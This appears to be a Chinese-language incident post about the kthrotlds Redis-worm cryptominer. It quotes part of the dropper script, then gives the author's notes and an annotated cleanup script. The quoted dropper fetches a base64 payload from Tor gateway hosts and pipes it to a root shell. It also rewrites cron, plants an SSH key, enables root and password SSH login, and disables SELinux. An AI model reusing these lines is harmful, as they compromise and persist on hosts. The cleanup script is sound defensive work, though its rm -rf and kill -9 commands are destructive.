if [ -f /etc/init.d/crond ]; then rc-update add crond >/dev/null 2>&1; /etc/init.d/crond restart >/dev/null 2>&1; else /usr/sbin/crond -c /etc/crontabs >/dev/null 2>&1; fi
fi
fi
${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
${sudo} rm -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} rm -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/.* >/dev/null 2>&1;
${sudo} chattr -i -a /etc/cron.hourly >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.hourly/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.daily >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.daily/ >/dev/null 2>&1
${sudo} rm -rf /etc/cron.hourly/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.hourly/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/.* >/dev/null 2>&1;
${sudo} chattr -a -i /tmp >/dev/null 2>&1; ${sudo} rm -rf /tmp/* >/dev/null 2>&1; ${sudo} rm -rf /tmp/.* >/dev/null 2>&1
${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/root >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/crontabs/root >/dev/null 2>&1
if [ -f /sbin/apk ]; then
${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/crontabs/* >/dev/null 2>&1
${sudo} rm -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo "${C1}" > /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo "${C2}" >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo '' >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} crontab /etc/crontabs/root
elif [ -f /usr/bin/apt-get ]; then
${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
rs=$(${sudo} echo "${C1}" > /var/spool/cron/crontabs/root 2>&1)
if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/crontabs/root && ${sudo} crontab /var/spool/cron/crontabs/root; fi
else
${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
rs=$(${sudo} echo "${C1}" > /var/spool/cron/root 2>&1)
if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root; fi
fi
${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo "${C2}" > /etc/crontab 2>&1)
if [ -z "${rs}" ]; then ${sudo} echo '' >> /etc/crontab && ${sudo} crontab /etc/crontab; fi
${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
rs=$(${sudo} echo "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo '' >> /etc/cron.d/root 2>&1)
if [ $(crontab -l 2>/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then
(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) && chmod +x ${LPATH}.rm
(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) && chmod +x ${LPATH}.cd
(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) && chmod +x ${LPATH}.ct
if [ -f ${LPATH}.rm ] && [ -f ${LPATH}.ct ]; then
${sudo} "${crstop}"
cd=$(which crond)
ct=$(which crontab)
#if [ -n "${cd}" ]; then ${sudo} ${LPATH}.rm ${cd}; ${sudo} cp ${LPATH}.cd ${cd}; fi
if [ -n "${ct}" ]; then ${sudo} ${LPATH}.rm ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi
${sudo} "${crstart}"
fi
fi
${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1
if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi
${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi
if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then ${sudo} echo "${skey}" >> ${sshdir}/authorized_keys; fi
${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} rm -rf ${sshdir}/authorized_keys* >/dev/null 2>&1
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] && { ${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config; }
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] && { ${sudo} echo RSAAuthentication yes >> /etc/ssh/sshd_config; }
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] && { ${sudo} echo PubkeyAuthentication yes >> /etc/ssh/sshd_config; }
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] && { ${sudo} echo UsePAM yes >> /etc/ssh/sshd_config; }
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] && { ${sudo} echo PasswordAuthentication yes >> /etc/ssh/sshd_config; }
touch "${LPATH}.sysud"
else
if [ $(which crontab|wc -l) -ne 0 ]; then
crontab -r >/dev/null 2>&1
(crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -
fi
fi
rm -rf ./main* >/dev/null 2>&1
rm -rf ./*.ico* >/dev/null 2>&1
rm -rf ./r64* >/dev/null 2>&1
rm -rf ./r32* >/dev/null 2>&1
echo -e '\n'
(${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash)
if [ ${sudoer} -eq 1 ]; then
if echo "$(${sudo} cat /etc/selinux/config 2>/dev/null|grep "SELINUX="|tail -n 1)"|grep -q 'enforcing'; then
${sudo} sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || { echo "SELinux could not be disabled. Exiting."; exit; }
${sudo} shutdown -r now >/dev/null 2>&1
${sudo} reboot -f >/dev/null 2>&1
fi
if echo "$(sestatus -v 2>/dev/null| head -n 1)"|grep -q 'enabled'; then ${sudo} shutdown -r now >/dev/null 2>&1; ${sudo} reboot -f >/dev/null 2>&1; fi
fi
```
这是一段 200 多行的 shell 脚本,没完全看懂。
大概能看到的是:判断目标 6379 端口上的 Redis 是否需要密码,
屏蔽或替换一些关键的 Linux 命令(如 crontab),
攻陷后再向其他机器发起端口扫描等。
代码虽然有了,怎么才能完全清除还不知道 :( 从代码看,它靠定时任务(每几分钟重新下载并执行)和写入 ssh 公钥两处做持久化,光 kill 进程是不够的。
记录一下。
这就是 kthrotlds 挖矿病毒。
update:终于清掉了。
清理脚本(综合了网上的一些,仅供参考):
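#!/bin/sh
# Cleanup for the kthrotlds / Redis-worm infection documented above.
# Collected from several online write-ups and adapted to what the dropper
# script above actually does. Almost every line is destructive (rm -rf,
# kill -9): read it before running it, run it as root, and prefer rebuilding
# the host when that is an option. Nothing in here fixes the root cause (a
# Redis instance reachable without a password) - see the notes at the end.
#
# `busybox` is used for ps/rm/chattr/sed on purpose: a library injected via
# /etc/ld.so.preload (libioset.so / libcset.so below) can hide files and
# processes from every dynamically linked tool, while a static busybox is
# unaffected. Lines that use plain ps/grep/rm may therefore miss things
# until step 3 has removed the preload library.

# 1. Stop cron first. The dropper re-downloads and re-executes itself every
#    few minutes from cron (the C1/C2 entries above), so deleting files while
#    cron still runs is a race you lose.
service crond stop
systemctl stop crond
service cron stop 2>/dev/null      # Debian/Ubuntu name for the same service

# 2. Block the download gateways and the mining pool.
#    iptables resolves these hostnames once, when the rule is inserted, so the
#    rules must be added BEFORE the /etc/hosts sinkhole entries below (after
#    them they would resolve to 0.0.0.0). The hosts-file sinkhole is the more
#    reliable of the two controls. an7kmd2wp4xo7hpr.onion.in.net is the fourth
#    gateway visible in the process list above and was missing from the
#    original list. Note the dropper deletes ".onion." lines from /etc/hosts
#    when it runs, which is one more reason step 1 has to come first.
for h in xmr.crypto-pool.fr an7kmd2wp4xo7hpr.tor2web.su an7kmd2wp4xo7hpr.tor2web.io an7kmd2wp4xo7hpr.onion.sh an7kmd2wp4xo7hpr.onion.in.net; do
    iptables -A INPUT -s "$h" -j DROP
    iptables -A OUTPUT -d "$h" -j DROP
done
busybox echo -e "\n0.0.0.0 an7kmd2wp4xo7hpr.tor2web.su\n0.0.0.0 an7kmd2wp4xo7hpr.tor2web.io\n0.0.0.0 an7kmd2wp4xo7hpr.onion.sh\n0.0.0.0 an7kmd2wp4xo7hpr.onion.in.net" >> /etc/hosts
busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts

# 3. Remove the LD_PRELOAD hook. /etc/ld.so.preload is normally chattr +i, so
#    the flag has to go first. The original deleted /etc/ld.so.cache and left
#    it missing; run ldconfig to rebuild it.
busybox rm -f /usr/local/lib/libioset.so
busybox rm -f /usr/local/lib/libcset.so
busybox chattr -i -a /etc/ld.so.preload && busybox rm -f /etc/ld.so.preload
busybox rm -f /etc/ld.so.cache
ldconfig
# Verify: nothing should still map the library and LD_PRELOAD should be empty.
lsof | grep usr/local/lib/libioset.so
echo "$LD_PRELOAD"

# 4. Kill the miner and dropper processes before touching their files, so a
#    live process cannot recreate them. The pattern list is this infection
#    plus names from related write-ups; `xargs kill -9` on an empty list only
#    prints a usage error, hence the 2>/dev/null.
for pat in hwlh3wlh44lh Circle_MI get.bi-chi.com hashvault.pro nanopool.org /usr/bin/.sshd /usr/bin/bsd-port xmr xig ddgs qW3xT wnTKYg t00ls.ru sustes thisxxs hashfish kworkerds ksoftirqds watchdogs kthrotlds kerberods an7kmd2wp4xo7hpr; do
    ps auxf | grep -v grep | grep -F -- "$pat" | awk '{print $2}' | xargs kill -9 2>/dev/null
done
# Second pass through the static busybox ps (PID is column 1 there), which a
# preload hook cannot filter.
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds|watchdogs|ksoftirqds|kerberods|an7kmd2wp4xo7hpr' | busybox awk '{print $1}' | busybox xargs kill -9 2>/dev/null
busybox pkill watchdogs
busybox pkill ksoftirqds
busybox pkill kthrotlds

# 5. Dropped files. Paths are the ones listed in this post plus the three
#    places the dropper picks for its LPATH (~/.cache, /tmp/.cache,
#    /usr/local/bin/.cache). It sets both +i and +a on that directory, so
#    both flags are cleared before rm (the original cleared only -i).
busybox rm -f /usr/local/bin/npt /usr/local/bin/nptd /usr/sbin/npt /usr/sbin/nptd
busybox rm -f /sbin/watchdogs /usr/sbin/watchdogs /usr/sbin/kthrotlds /etc/init.d/watchdogs
busybox chattr -i -a /usr/bin/kerberods && busybox rm -rf /usr/bin/kerberods
busybox rm -rf /usr/sbin/kerberods
# `/usr/sbin/ntpd -u ntp:ntp -g` in the process list above is also the normal
# CentOS ntpd command line. Only remove the binary if it no longer verifies
# against its package (rpm -Vf exits non-zero for a modified or unowned
# file); on non-rpm systems use `dpkg -V` or your package manager instead.
if command -v rpm >/dev/null 2>&1 && ! rpm -Vf /usr/sbin/ntpd >/dev/null 2>&1; then
    busybox rm -f /usr/sbin/ntpd
fi
busybox chattr -i -a "$HOME/.ntp" && busybox rm -rf "$HOME/.ntp"
busybox chattr -i -a "$HOME/.cache" && busybox rm -rf "$HOME/.cache"
busybox chattr -i -a /.cache/* && busybox rm -rf /.cache
busybox chattr -i -a /usr/local/bin/.cache && busybox rm -rf /usr/local/bin/.cache
# Clear /tmp but keep the directory: the original removed /tmp itself, which
# breaks everything that needs a temp dir until it is recreated as mode 1777.
busybox chattr -i -a /tmp && busybox rm -rf /tmp/* /tmp/.[!.]*
# Look for anything the name lists missed, e.g. files changed in the
# infection window:  find / -type f -mtime -50 -a -mtime +10 | more
busybox find / -type f -name '*watchdogs*' | busybox xargs rm -f
busybox find / -type f -name '*kthrotlds*' | busybox xargs rm -f

# 6. Init / systemd entries. Only the worm's own `netdns` entries are removed.
#    The original also ran `rm -rf /etc/rc.d/rc?.d/S*` and `K*`, which deletes
#    every SysV start/stop link on the box (sshd, network, ...) so nothing
#    starts after the next reboot - do not do that. (The original also had a
#    typo, `netdns.servic`, so the unit file itself was never removed.)
rm -rf /etc/init.d/netdns
rm -rf /etc/rc.d/rc0.d/K01netdns /etc/rc.d/rc1.d/K01netdns /etc/rc.d/rc6.d/K01netdns
rm -rf /etc/rc.d/rc2.d/S99netdns /etc/rc.d/rc3.d/S99netdns /etc/rc.d/rc4.d/S99netdns /etc/rc.d/rc5.d/S99netdns
rm -rf /etc/systemd/system/multi-user.target.wants/netdns.service
rm -rf /usr/lib/systemd/system/netdns.service
systemctl daemon-reload

# 7. Cron. The dropper writes the root crontab, /etc/crontab, /etc/cron.d/root
#    and the cron.* directories, and swaps the crontab binary for a busybox
#    build. The `chattr +i` on the recreated root crontab files is deliberate
#    (it stops the next run from re-adding itself) - remember to `chattr -i`
#    when you later need to edit them. The original left the crontabs/root
#    placeholder writable (`chattr -i` instead of `+i`).
#    CAUTION: the wildcard removals also delete legitimate distro jobs
#    (logrotate, sysstat, ...). A text grep for the domain is not a reliable
#    filter because the file the dropper puts in /etc/cron.daily is a
#    base64-encoded script; review each file by hand or reinstall the
#    affected packages afterwards.
busybox chattr -i -a /etc/cron.d/* && busybox rm -f /etc/cron.d/*
busybox chattr -i -a /etc/cron.hourly/* && busybox rm -f /etc/cron.hourly/*
busybox chattr -i -a /etc/cron.daily/* && busybox rm -f /etc/cron.daily/*
busybox chattr -i -a /etc/cron.weekly/* && busybox rm -f /etc/cron.weekly/*
busybox chattr -i -a /etc/cron.monthly/* && busybox rm -f /etc/cron.monthly/*
busybox chattr -i -a /var/spool/cron/root && busybox rm -f /var/spool/cron/root && busybox touch /var/spool/cron/root && busybox chattr +i /var/spool/cron/root
busybox chattr -i -a /var/spool/cron/crontabs/root && busybox rm -f /var/spool/cron/crontabs/root && busybox touch /var/spool/cron/crontabs/root && busybox chattr +i /var/spool/cron/crontabs/root
busybox chattr -i -a /etc/cron.d/root && busybox rm -f /etc/cron.d/root && busybox touch /etc/cron.d/root && busybox chattr +i /etc/cron.d/root
# /etc/crontab and /etc/crontabs/root (the Alpine path) were not covered by
# the original; the C1/C2 entries carry the gateway host name in clear.
busybox chattr -i -a /etc/crontab && busybox sed -i '/an7kmd2wp4xo7hpr/d' /etc/crontab
busybox chattr -i -a /etc/crontabs/root 2>/dev/null && busybox sed -i '/an7kmd2wp4xo7hpr/d' /etc/crontabs/root
# The dropper replaces crontab(1) with a busybox binary; reinstall the cron
# package if it no longer verifies.
command -v rpm >/dev/null 2>&1 && rpm -Vf "$(command -v crontab)"

# 8. SSH persistence, which the original cleanup left untouched. The dropper
#    appends its key (the `ssh-rsa AAAAB3Nza...C1Sdr0tIIL8y... user@localhost`
#    key in the script above) to authorized_keys and makes the file immutable;
#    the Redis scanner can also SAVE an RDB dump straight into the file.
#    /home/ubuntu/.ssh is one of its targets, so every home is checked.
for d in /root/.ssh /home/*/.ssh; do
    [ -f "$d/authorized_keys" ] || continue
    busybox chattr -i -a "$d" "$d/authorized_keys"
    if busybox head -c 5 "$d/authorized_keys" | busybox grep -q '^REDIS'; then
        busybox rm -f "$d/authorized_keys"     # an RDB dump; nothing legitimate is left in it
    else
        busybox sed -i '/C1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx/d' "$d/authorized_keys"
    fi
done
# Review the remaining keys by hand, then undo the sshd_config lines the
# dropper appends (PermitRootLogin yes, PasswordAuthentication yes, UsePAM
# yes, ...) according to your own policy and restart sshd.
grep -n '^PermitRootLogin\|^PasswordAuthentication\|^PubkeyAuthentication\|^RSAAuthentication\|^UsePAM' /etc/ssh/sshd_config
# The dropper also sets SELINUX=disabled in /etc/selinux/config; restore it.
grep -n '^SELINUX=' /etc/selinux/config 2>/dev/null

# 9. Root cause. The worm got in over tcp/6379 on a Redis with no password;
#    the scanner above changes `dir`/`dbfilename` and SAVEs its RDB file into
#    cron and .ssh directories. Before starting Redis again: set
#    `requirepass`, `bind 127.0.0.1` and `protected-mode yes` in redis.conf,
#    firewall tcp/6379 from the internet, and check that `dir`/`dbfilename`
#    still point at the real dump (the scanner tries to restore them and
#    otherwise falls back to /var/lib/redis/dump.rdb). Rotate every
#    credential that lived on this host, and keep watching for the cron
#    entries and the outbound connections to the gateways coming back.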